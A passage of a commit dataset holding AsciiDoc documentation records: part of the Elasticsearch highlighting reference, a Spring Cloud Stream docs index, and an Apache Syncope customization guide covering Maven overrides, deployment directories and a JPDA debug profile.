query\n\nIt is also possible to highlight against a query other than the search\nquery by setting `highlight_query`. This is especially useful if you\nuse a rescore query because those are not taken into account by\nhighlighting by default. Elasticsearch does not validate that\n`highlight_query` contains the search query in any way so it is possible\nto define it so legitimate query results aren't highlighted at all.\nGenerally it is better to include the search query in the\n`highlight_query`.
Here is an example of including both the search\nquery and the rescore query in `highlight_query`.\n[source,js]\n--------------------------------------------------\n{\n \"fields\": [ \"_id\" ],\n \"query\" : {\n \"match\": {\n \"content\": {\n \"query\": \"foo bar\"\n }\n }\n },\n \"rescore\": {\n \"window_size\": 50,\n \"query\": {\n \"rescore_query\" : {\n \"match_phrase\": {\n \"content\": {\n \"query\": \"foo bar\",\n \"phrase_slop\": 1\n }\n }\n },\n \"rescore_query_weight\" : 10\n }\n },\n \"highlight\" : {\n \"order\" : \"score\",\n \"fields\" : {\n \"content\" : {\n \"fragment_size\" : 150,\n \"number_of_fragments\" : 3,\n \"highlight_query\": {\n \"bool\": {\n \"must\": {\n \"match\": {\n \"content\": {\n \"query\": \"foo bar\"\n }\n }\n },\n \"should\": {\n \"match_phrase\": {\n \"content\": {\n \"query\": \"foo bar\",\n \"phrase_slop\": 1,\n \"boost\": 10.0\n }\n }\n },\n \"minimum_should_match\": 0\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nNote that the score of a text fragment in this case is calculated by the Lucene\nhighlighting framework. For implementation details you can check the\n`ScoreOrderFragmentsBuilder.java` class. On the other hand when using the\npostings highlighter the fragments are scored using, as mentioned above,\nthe BM25 algorithm.\n\n[[highlighting-settings]]\n==== Global Settings\n\nHighlighting settings can be set on a global level and then overridden\nat the field level.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"number_of_fragments\" : 3,\n \"fragment_size\" : 150,\n \"tag_schema\" : \"styled\",\n \"fields\" : {\n \"_all\" : { \"pre_tags\" : [\"<em>\"], \"post_tags\" : [\"<\/em>\"] },\n \"bio.title\" : { \"number_of_fragments\" : 0 },\n \"bio.author\" : { \"number_of_fragments\" : 0 },\n \"bio.content\" : { \"number_of_fragments\" : 5, \"order\" : \"score\" }\n }\n }\n}\n--------------------------------------------------\n\n[[field-match]]\n==== Require Field Match\n\n`require_field_match` can be set to `true` which will cause a field to\nbe highlighted only if a query matched that field. `false` means that\nterms are highlighted on all requested fields regardless of whether the query\nmatches specifically on them.\n\n
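For example, a minimal sketch that restricts highlighting to fields the\nquery actually matched:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"require_field_match\" : true,\n \"fields\" : {\n \"content\" : {}\n }\n }\n}\n--------------------------------------------------\n\n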
[[boundary-characters]]\n==== Boundary Characters\n\nWhen highlighting a field using the fast vector highlighter,\n`boundary_chars` can be configured to define what constitutes a boundary\nfor highlighting. It's a single string with each boundary character\ndefined in it. It defaults to `.,!? \t\n`.\n\nThe `boundary_max_scan` allows controlling how far to look for boundary\ncharacters, and defaults to `20`.\n\n\n[[matched-fields]]\n==== Matched Fields\nThe Fast Vector Highlighter can combine matches on multiple fields to\nhighlight a single field using `matched_fields`. This is most\nintuitive for multifields that analyze the same string in different\nways. All `matched_fields` must have `term_vector` set to\n`with_positions_offsets` but only the field to which the matches are\ncombined is loaded so only that field would benefit from having\n`store` set to `yes`.\n\nIn the following examples `content` is analyzed by the `english`\nanalyzer and `content.plain` is analyzed by the `standard` analyzer.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"content.plain:running scissors\",\n \"fields\": [\"content\"]\n }\n },\n \"highlight\": {\n \"order\": \"score\",\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content\", \"content.plain\"],\n \"type\" : \"fvh\"\n }\n }\n }\n}\n--------------------------------------------------\nThe above matches both \"run with scissors\" and \"running with scissors\"\nand would highlight \"running\" and \"scissors\" but not \"run\". If both\nphrases appear in a large document then \"running with scissors\" is\nsorted above \"run with scissors\" in the fragments list because there\nare more matches in that fragment.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"running scissors\",\n \"fields\": [\"content\", \"content.plain^10\"]\n }\n },\n \"highlight\": {\n \"order\": \"score\",\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content\", \"content.plain\"],\n \"type\" : \"fvh\"\n }\n }\n }\n}\n--------------------------------------------------\nThe above highlights \"run\" as well as \"running\" and \"scissors\" but\nstill sorts \"running with scissors\" above \"run with scissors\" because\nthe plain match (\"running\") is boosted.\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"running scissors\",\n \"fields\": [\"content\", \"content.plain^10\"]\n }\n },\n \"highlight\": {\n \"order\": \"score\",\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content.plain\"],\n \"type\" : \"fvh\"\n }\n }\n }\n}\n--------------------------------------------------\nThe above query wouldn't highlight \"run\" or \"scissor\" but shows that\nit is just fine not to list the field to which the matches are combined\n(`content`) in the matched fields.\n\n[NOTE]\nTechnically it is also fine to add fields to `matched_fields` that\ndon't share the same underlying string as the field to which the matches\nare combined. The results might not make much sense and if one of the\nmatches is off the end of the text then the whole query will fail.\n\n[NOTE]\n===================================================================\nThere is a small amount of overhead involved with setting\n`matched_fields` to a non-empty array so always prefer\n[source,js]\n--------------------------------------------------\n \"highlight\": {\n \"fields\": {\n \"content\": {}\n }\n }\n--------------------------------------------------\nto\n[source,js]\n--------------------------------------------------\n \"highlight\": {\n \"fields\": {\n \"content\": {\n \"matched_fields\": [\"content\"],\n \"type\" : \"fvh\"\n }\n }\n }\n--------------------------------------------------\n===================================================================\n\n[[phrase-limit]]\n==== Phrase Limit\nThe `fast-vector-highlighter` has a `phrase_limit` parameter that prevents\nit from analyzing too many phrases and eating tons of memory. It defaults\nto 256, so only the first 256 matching phrases in the document are\nconsidered for scoring. You can raise the limit with the `phrase_limit`\nparameter but keep in mind that scoring more phrases consumes more time\nand memory.\n\nIf using `matched_fields`, keep in mind that `phrase_limit` phrases per\nmatched field are considered.\n\n
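For example, a minimal sketch that raises the limit for very large\ndocuments (the value is illustrative):\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {...},\n \"highlight\" : {\n \"phrase_limit\" : 512,\n \"fields\" : {\n \"content\" : {\"type\" : \"fvh\"}\n }\n }\n}\n--------------------------------------------------\n\n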
[[explicit-field-order]]\n=== Field Highlight Order\nElasticsearch highlights the fields in the order that they are sent. Per the\nJSON spec, objects are unordered, but if you need to be explicit about the\norder in which fields are highlighted, you can use an array for `fields` like\nthis:\n[source,js]\n--------------------------------------------------\n \"highlight\": {\n \"fields\": [\n {\"title\":{ \/*params*\/ }},\n {\"text\":{ \/*params*\/ }}\n ]\n }\n--------------------------------------------------\nNone of the highlighters built into Elasticsearch care about the order in\nwhich the fields are highlighted but a plugin may.\n","old_contents":""
,"returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6d0e23ddc81e2d6e448117ec8a4c6dddf51c92f","subject":"Show KStreams binder as a top-level section in the docs (#44)","message":"Show KStreams binder as a top-level section in the docs (#44)\n\n","repos":"spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream","old_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/spring-cloud-stream-aggregate.adoc","new_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/spring-cloud-stream-aggregate.adoc","new_contents":"include::{stream-docs-basedir}\/core\/spring-cloud-stream-core-docs\/src\/main\/asciidoc\/spring-cloud-stream-overview.adoc[]\n\n= Binder Implementations\n\n== Apache Kafka Binder\n\ninclude::{stream-docs-basedir}\/kafka\/spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-kafka-aggregate.adoc[leveloffset=+1]\n\n== Apache Kafka Streams Binder\n\ninclude::{stream-docs-basedir}\/kafka\/spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/kafka-streams.adoc[leveloffset=+1]\n\n== RabbitMQ Binder\n\ninclude::{stream-docs-basedir}\/rabbit\/spring-cloud-stream-binder-rabbit-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-rabbit-aggregate.adoc[leveloffset=+1]\n","old_contents":"include::{stream-docs-basedir}\/core\/spring-cloud-stream-core-docs\/src\/main\/asciidoc\/spring-cloud-stream-overview.adoc[]\n\n= Binder Implementations\n\n== Apache Kafka Binder\n\ninclude::{stream-docs-basedir}\/kafka\/spring-cloud-stream-binder-kafka-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-kafka-aggregate.adoc[leveloffset=+1]\n\n== RabbitMQ Binder\n\ninclude::{stream-docs-basedir}\/rabbit\/spring-cloud-stream-binder-rabbit-docs\/src\/main\/asciidoc\/spring-cloud-stream-binder-rabbit-aggregate.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d490b45c194f621ce2faf66f1f03b8f89a97fae5","subject":"Fixing typo","message":"Fixing typo\n","repos":"ilgrosso\/syncope,ilgrosso\/syncope,apache\/syncope,ilgrosso\/syncope,apache\/syncope,ilgrosso\/syncope,apache\/syncope,apache\/syncope","old_file":"src\/main\/asciidoc\/reference-guide\/workingwithapachesyncope\/customization.adoc","new_file":"src\/main\/asciidoc\/reference-guide\/workingwithapachesyncope\/customization.adoc","new_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License.
You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\/\/\n=== Customization\n\n[CAUTION]\nOnly Maven projects can be customized: if using Standalone, Debian packages or the GUI installer, none of the\ncustomizations discussed below can be applied.\n\nApache Syncope is designed to be as flexible as possible, to best suit the various environments\nin which it can be deployed. Besides other aspects, this means that every feature and component can be extended or\nreplaced.\n\nOnce the project has been created from the provided Maven archetype, the generated source tree is available for either\nadding new features or replacing existing components.\n\n[[override-behavior]]\n[TIP]\n.Override behavior\n====\nAs a rule of thumb, any file of the local project will take precedence over a file with the same name in the same\ndirectory of the standard Apache Syncope release.\n\nFor example, if you place\n\n core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java\n\nin the local project, this file will be picked up instead of\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java[SyncopeAuthenticationProvider^].\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java[SyncopeAuthenticationProvider^].\nendif::[]\n\nThe same happens with resources as images or HTML files; if you place\n\n console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html\n\nin the local project, this file will be picked up instead of\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/client\/console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html[BasePage.html^].\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/client\/console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html[BasePage.html^].\nendif::[]\n\nThis general behavior might have exceptions, as highlighted below.\n====\n\nIn general, the Embedded Mode (see the\nifeval::[\"{backend}\" == \"html5\"]\nhttp:\/\/syncope.apache.org\/docs\/getting-started.html[Apache Syncope Getting Started Guide]\nendif::[]\nifeval::[\"{backend}\" == \"pdf\"]\nhttp:\/\/syncope.apache.org\/docs\/getting-started.pdf[Apache Syncope Getting Started Guide]\nendif::[]\nfor details) allows the user to work comfortably from a single workstation, with no need of additional setup; it is\neffectively implemented as the `all`\nhttps:\/\/maven.apache.org\/guides\/introduction\/introduction-to-profiles.html[Maven profile^], where the available optional\ncomponents and extensions are enabled. 
+\nWhen deploying the generated WAR artifacts into an external <<javaee-container>> however, the required components and\nextensions need to be explicitly selected and enabled, as shown in the following text.\n\n[[deployment-directories]]\n.Deployment directories\n****\nApache Syncope needs three base directories to be defined:\n\n* bundles - where the <<external-resources,connector bundles>> are stored;\n* log - where all the system logs are written;\n* conf (optional) - where configuration files are located, if overriding the default values is needed.\n\n[WARNING]\nThe `bundles` directory should only contain connector bundle JAR files. +\nThe presence of any other file might cause the unavailability of any connector bundle in Apache Syncope.\n\nFor reference, the suggested directory layout can be created as follows:\n\n....\n$ mkdir \/opt\/syncope\n$ mkdir \/opt\/syncope\/bundles\n$ mkdir \/opt\/syncope\/log\n$ mkdir \/opt\/syncope\/conf\n....\n****\n\nThe WAR artifacts are generated by running the Maven command (with reference to the suggested directory layout):\n\n....\nmvn clean verify \\\n -Dconf.directory=\/opt\/syncope\/conf \\\n -Dbundles.directory=\/opt\/syncope\/bundles \\\n -Dlog.directory=\/opt\/syncope\/log\n....\n\nAfter downloading all of the dependencies that are needed, three WAR files will be produced:\n\n. `core\/target\/syncope.war`\n. `console\/target\/syncope-console.war`\n. `enduser\/target\/syncope-enduser.war`\n\nIf no failures are encountered, your basic Apache Syncope project is now ready to be deployed.\n\n[[embedded-debug]]\n[TIP]\n.JPDA Debug in Embedded Mode\n====\nThe Java\u2122 Platform Debugger Architecture (http:\/\/docs.oracle.com\/javase\/8\/docs\/technotes\/guides\/jpda\/index.html[JPDA^])\nis a collection of APIs aimed to help with debugging Java code.\n\nEnhancing the `embedded` profile of the `enduser` module to enable the JPDA socket is quite\nstraightforward: just add the `<profile>` below to `enduser\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<profile>\n <id>debug<\/id>\n\n <build>\n <plugins>\n <plugin>\n <groupId>org.codehaus.cargo<\/groupId>\n <artifactId>cargo-maven2-plugin<\/artifactId>\n <inherited>true<\/inherited>\n <configuration>\n <configuration>\n <properties>\n <cargo.jvmargs>\n -Xdebug\n -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=n\n -noverify -XX:+CMSClassUnloadingEnabled\n -XX:+UseConcMarkSweepGC -Xmx1024m -Xms512m\n <\/cargo.jvmargs>\n <\/properties>\n <\/configuration>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n <\/build>\n<\/profile>\n----\n\nNow, from the `enduser` subdirectory, execute:\n\n[source,bash]\nmvn -P embedded,debug\n\nAt this point your favorite IDE can be attached to the port `8000`; please note that you might need to add\n`-XX:MaxPermSize=512m` to `<cargo.jvmargs>` in order to run with JDK 7.\n====\n\n[[customization-core]]\n==== Core\n\n[CAUTION]\nWhen providing custom Java classes implementing the defined interfaces or extending the existing\nimplementations, their package *must* be rooted under `org.apache.syncope.core`, otherwise they will not be available\nat runtime.\n\nBesides replacing existing classes as explained <<override-behavior,above>>, new implementations can be provided under\n`core\/src\/main\/java` for the following components:\n\n* <<propagationactions,propagation>>, <<pushactions,push>>, <<pullactions,pull>> and <<logicactions,logic>> actions\n* <<push-correlation-rules,push>> \/ <<pull-correlation-rules,pull>> correlation rules\n* 
<<pull-mode,reconciliation filter builders>>\n* <<tasks-custom,custom tasks>>\n* <<reportlets,reportlets>>\n* <<account-rules,account>> and <<password-rules,password>> rules for policies\n* <<plain,plain schema validators>>\n* <<mapping,mapping item transformers>>\n* <<virtual-attribute-cache,virtual attribute cache>>\n* <<workflow-adapters,workflow adapters>>\n* <<provisioning-managers,provisioning managers>>\n* <<notifications,notification recipient providers>>\n\n[[new-rest-endpoints]]\n[TIP]\n.New REST endpoints\n====\nAdding a new REST endpoint involves several operations:\n\n. create - in an extension's `rest-api` module or under `common` otherwise - a Java interface with package\n`org.apache.syncope.common.rest.api.service` and proper JAX-RS annotations; check\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/rest-api\/src\/main\/java\/org\/apache\/syncope\/common\/rest\/api\/service\/CamelRouteService.java[CamelRouteService^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/rest-api\/src\/main\/java\/org\/apache\/syncope\/common\/rest\/api\/service\/CamelRouteService.java[CamelRouteService^]\nendif::[]\nfor reference;\n. if needed, define supporting payload objects - in an extension's `common-lib` module or under `common` otherwise;\ncheck\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/common-lib\/src\/main\/java\/org\/apache\/syncope\/common\/lib\/to\/CamelRouteTO.java[CamelRouteTO^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/common-lib\/src\/main\/java\/org\/apache\/syncope\/common\/lib\/to\/CamelRouteTO.java[CamelRouteTO^]\nendif::[]\nfor reference;\n. implement - in an extension's `rest-cxf` module or under `core` otherwise - the interface defined above in a Java\nclass with package `org.apache.syncope.core.rest.cxf.service`; check\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/ext\/camel\/rest-cxf\/src\/main\/java\/org\/apache\/syncope\/core\/rest\/cxf\/service\/CamelRouteServiceImpl.java[CamelRouteServiceImpl^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/ext\/camel\/rest-cxf\/src\/main\/java\/org\/apache\/syncope\/core\/rest\/cxf\/service\/CamelRouteServiceImpl.java[CamelRouteServiceImpl^]\nendif::[]\nfor reference.\n\nBy following such conventions, the new REST endpoint will be automatically picked up alongside the default services;\na minimal sketch of step 1 is shown below.\n====\n\n
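Purely for illustration, here is what the interface from step 1 might look like; `WidgetService` and `WidgetTO` are\nhypothetical names, not classes shipped with Apache Syncope:\n\n[source,java]\n----\npackage org.apache.syncope.common.rest.api.service;\n\nimport java.util.List;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n\/\/ Hypothetical endpoint listing custom payload objects (WidgetTO would be defined as per step 2)\n@Path(\"widgets\")\npublic interface WidgetService extends JAXRSService {\n\n \/\/ GET \/widgets - returns all defined widgets, as XML or JSON\n @GET\n @Produces({ MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON })\n List<WidgetTO> list();\n}\n----\n\n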
For example, if you want to customize \nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/core\/spring\/src\/main\/resources\/securityContext.xml[securityContext.xml^]\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/core\/spring\/src\/main\/resources\/securityContext.xml[securityContext.xml^]\nendif::[]\n, you will also need to replace the following text in `core\/src\/main\/webapp\/WEB-INF\/web.xml`,\n\n....\nclasspath*:\/*Context.xml\n....\n\nwith\n\n....\nclasspath:\/coreContext.xml\nclasspath:\/securityContext.xml\nclasspath*:\/logicContext.xml\nclasspath*:\/restCXFContext.xml\nclasspath*:\/persistenceContext.xml\nclasspath*:\/provisioningContext.xml\nclasspath*:\/workflowContext.xml\n....\n\nto be sure that `core\/src\/main\/resources\/securityContext.xml` is picked up. +\nPlease also note that the actual list of Spring context files to include might depend on the configured extensions.\n====\n\n[discrete]\n===== Select the <<activiti-user-workflow-adapter>>\n\nAdd the following dependency to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.core<\/groupId>\n <artifactId>syncope-core-workflow-activiti<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\nCopy `core\/src\/main\/resources\/all\/workflow.properties` to `core\/src\/main\/resources\/workflow.properties`.\n\n[discrete]\n===== Enable the <<apache-camel-provisioning-manager>>\n\nAdd the following dependencies to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-rest-cxf<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-persistence-jpa<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-provisioning<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\nCopy `core\/src\/main\/resources\/all\/provisioning.properties` to `core\/src\/main\/resources\/provisioning.properties`.\n\n[discrete]\n===== Enable the <<swagger>> extension\n\nAdd the following dependency to `core\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext<\/groupId>\n <artifactId>syncope-ext-swagger-ui<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency>\n----\n\n[[customization-console]]\n==== Console\n\n[CAUTION]\nWhen providing custom Java classes implementing the defined interfaces or extending the existing\nimplementations, their package *must* be rooted under `org.apache.syncope.client.console`, otherwise they will not be\navailable at runtime.\n\n[discrete]\n===== Enable the <<apache-camel-provisioning-manager>>\n\nAdd the following dependency to `console\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.apache.syncope.ext.camel<\/groupId>\n <artifactId>syncope-ext-camel-client-console<\/artifactId>\n <version>${syncope.version}<\/version>\n<\/dependency> \n----\n\n[[customization-enduser]]\n==== Enduser\n\nGiven the nature of the <<enduser-application>>, all the files required by the AngularJS-based frontend to run are\ngenerated under the local project's 
`enduser\/src\/main\/webapp\/app\/` directory and are available for full customization.\n\nThe files in use by the Apache Wicket-based backend are still subject to the general\n<<override-behavior,override behavior>>, instead.\n\n[[customization-extensions]]\n==== Extensions\n\n<<extensions>> can be part of a local project, to encapsulate special features which are specific to a given deployment.\n\nFor example, the http:\/\/www.chorevolution.eu\/[CHOReVOLUTION^] IdM - based on Apache Syncope - provides\nhttps:\/\/tuleap.ow2.org\/plugins\/git\/chorevolution\/syncope?p=syncope.git&a=tree&f=ext\/choreography[an extension^]\nfor managing via the <<core>> and visualizing via the <<admin-console-component>> the running choreography instances.\n","old_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\/\/\n=== Customization\n\n[CAUTION]\nOnly Maven projects can be customized: if using Standalone, Debian packages or the GUI installer, none of the\ncustomizations discussed below can be applied.\n\nApache Syncope is designed to be as flexible as possible, to best suit the various environments\nin which it can be deployed. 
Besides other aspects, this means that every feature and component can be extended or\nreplaced.\n\nOnce the project has been created from the provided Maven archetype, the generated source tree is available for either\nadding new features or replacing existing components.\n\n[[override-behavior]]\n[TIP]\n.Override behavior\n====\nAs a rule of thumb, any file of the local project will take precedence over a file with the same name in the same\ndirectory of the standard Apache Syncope release.\n\nFor example, if you place\n\n core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java\n\nin the local project, this file will be picked up instead of\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java[SyncopeAuthenticationProvider^].\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/core\/spring\/src\/main\/java\/org\/apache\/syncope\/core\/spring\/security\/SyncopeAuthenticationProvider.java[SyncopeAuthenticationProvider^].\nendif::[]\n\nThe same happens with resources as images or HTML files; if you place\n\n console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html\n\nin the local project, this file will be picked up instead of\nifeval::[\"{snapshotOrRelease}\" == \"release\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/syncope-{docVersion}\/client\/console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html[BasePage.html^].\nendif::[]\nifeval::[\"{snapshotOrRelease}\" == \"snapshot\"]\nhttps:\/\/github.com\/apache\/syncope\/blob\/master\/client\/console\/src\/main\/resources\/org\/apache\/syncope\/client\/console\/pages\/BasePage.html[BasePage.html^].\nendif::[]\n\nThis general behavior might have exceptions, as highlighted below.\n====\n\nIn general, the Embedded Mode (see the\nifeval::[\"{backend}\" == \"html5\"]\nhttp:\/\/syncope.apache.org\/docs\/getting-started.html[Apache Syncope Getting Started Guide]\nendif::[]\nifeval::[\"{backend}\" == \"pdf\"]\nhttp:\/\/syncope.apache.org\/docs\/getting-started.pdf[Apache Syncope Getting Started Guide]\nendif::[]\nfor details) allows the user to work comfortably from a single workstation, with no need of additional setup; it is\neffectively implemented as the `all`\nhttps:\/\/maven.apache.org\/guides\/introduction\/introduction-to-profiles.html[Maven profile^], where the available optional\ncomponents and extensions are enabled. +\nWhen deploying the generated WAR artifacts into an external <<javaee-container>> however, the required components and\nextensions need to be explicitly selected and enabled, as shown in the following text.\n\n[[deployment-directories]]\n.Deployment directories\n****\nApache Syncope needs three base directories to be defined:\n\n* bundles - where the <<external-resources,connector bundles>> are stored;\n* log - where all the system logs are written;\n* conf (optional) - where configuration files are located, if overriding the default values is needed.\n\n[WARNING]\nThe `bundles` directory should only contain connector bundle JAR files. 
+\nThe presence of any other file might cause the unavailability of any connector bundle in Apache Syncope.\n\nFor reference, the suggested directory layout can be created as follows:\n\n....\n$ mkdir \/opt\/syncope\n$ mkdir \/opt\/syncope\/bundles\n$ mkdir \/opt\/syncope\/log\n$ mkdir \/opt\/syncope\/conf\n....\n****\n\nThe WAR artifacts are generated by running the Maven command (with reference to the suggested directory layout):\n\n....\nmvn clean verify \\\n -Dconf.directory=\/opt\/syncope\/conf \\\n -Dbundles.directory=\/opt\/syncope\/bundles \\\n -Dlog.directory=\/opt\/syncope\/log\n....\n\nAfter downloading all of the dependencies that are needed, three WAR files will be produced:\n\n. `core\/target\/syncope.war`\n. `console\/target\/syncope-console.war`\n. `enduser\/target\/syncope-enduser.war`\n\nIf no failures are encountered, your basic Apache Syncope project is now ready to be deployed.\n\n[[embedded-debug]]\n[TIP]\n.JPDA Debug in Embedded Mode\n====\nThe Java\u2122 Platform Debugger Architecture (http:\/\/docs.oracle.com\/javase\/8\/docs\/technotes\/guides\/jpda\/index.html[JPDA^])\nis a collection of APIs aimed to help with debugging Java code.\n\nEnhancing the `embedded` profile of the `enduser` module to enable the JPDA socket is quite\nstraightforward: just add the `<profile>` below to `enduser\/pom.xml`:\n\n[source,xml,subs=\"verbatim,attributes\"]\n----\n<profile>\n <id>debug<\/id>\n\n <build>\n <plugin>\n <plugin>\n <groupId>org.codehaus.cargo<\/groupId>\n <artifactId>cargo-maven2-plugin<\/artifactId>\n <inherited>true<\/inherited>\n <configuration>\n <configuration>\n <properties>\n <cargo.jvmargs>\n -Xdebug\n -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=n\n -noverify -XX:+CMSClassUnloadingEnabled\n -XX:+UseConcMarkSweepGC -Xmx1024m -Xms512m\n <\/cargo.jvmargs>\n <\/properties>\n <\/configuration>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n <\/build>\n<\/profile>\n----\n\nNow, from the `enduser` subdirectory, execute:\n\n[source,bash]\nmvn -P embedded,debug\n\nAt this point your favorite IDE can be attached to the port `8000`; please note that you might need to add\n`-XX:MaxPermSize=512m` to `<cargo.jvmargs>` in order to run with JDK 7.\n====\n\n[[customization-core]]\n==== Core\n\n[CAUTION]\nWhen providing custom Java classes implementing the defined interfaces or extending the existing\nimplementations, their package *must* be rooted under `org.apache.syncope.core`, otherwise they will not be available\nat runtime.\n\nBesides replacing existing classes as explained <<override-behavior,above>>, new implementations can be provided under\n`core\/src\/main\/java` for the following components:\n\n* <<propagationactions,propagation>>, <<pushactions,push>>, <<pullactions,pull>> and <<logicactions,logic>> actions\n* 